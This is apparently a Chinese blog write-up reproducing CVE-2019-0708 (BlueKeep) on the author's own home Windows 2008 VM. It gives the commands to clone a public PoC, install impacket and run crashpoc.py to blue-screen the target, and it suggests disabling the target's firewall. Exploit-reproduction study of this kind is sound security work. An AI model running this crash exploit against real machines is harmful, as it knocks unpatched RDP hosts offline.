CVE-2019-0708漏洞复现--001

前言:

学习渗透的时候,老师就说这条路不是一帆风顺的,要经过很久的练习。
所以现在,准备每周复现一个漏洞,今天复现的这个漏洞,说来也比较巧,自己在家搭建的esxi里面的家庭影音服务器(2008的系统)恰好被扫出来了这个漏洞,然后自己说好好利用一下

正片开始:
首先自己的电脑用Nessus扫描内网的时候发现了这漏洞
nessus扫描结果
然后我又用goby全局扫描了一下,好家伙,这个虚拟机有这个漏洞没跑了goby扫描结果
去github上搜了一下CVE-2019-0708,发现有一个老哥有这个POC,准备开整,不过,开整之前,咱们先把虚拟机做一个快照(毕竟是家庭影音服务器,还有很多资源的)
在这里插入图片描述
打开kali,克隆一下大佬的github下来到kali里面

git clone https://github.com/n1xbyte/CVE-2019-0708.git

然后看了一下里面的readme
开整
首先安装一个库

pip3 install impacket

报错了的小伙伴需要先执行这个命令

sudo apt-get install --reinstall python3-pip
pip3 install --upgrade pip
pip --version #查看pip版本

然后在执行

pip3 install impacket

在这里插入图片描述
最后一条命令

python3 crashpoc.py 192.168.1.20 64  --用python3+脚本文件+IP地址+64位系统

在这里插入图片描述
好的,漏洞利用成功,成功蓝屏,打完收工

修复建议
去下载微软的补丁包吧!

总结
这个漏洞是利用rdp协议来实现的,所以要开目标主机的远程桌面,各位如果利用失败的话,把目标的防火墙也关一下
各位想用CVE-2019-0708的利用脚本的话,我发出来,自己丢到kali里面解压就好了!

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值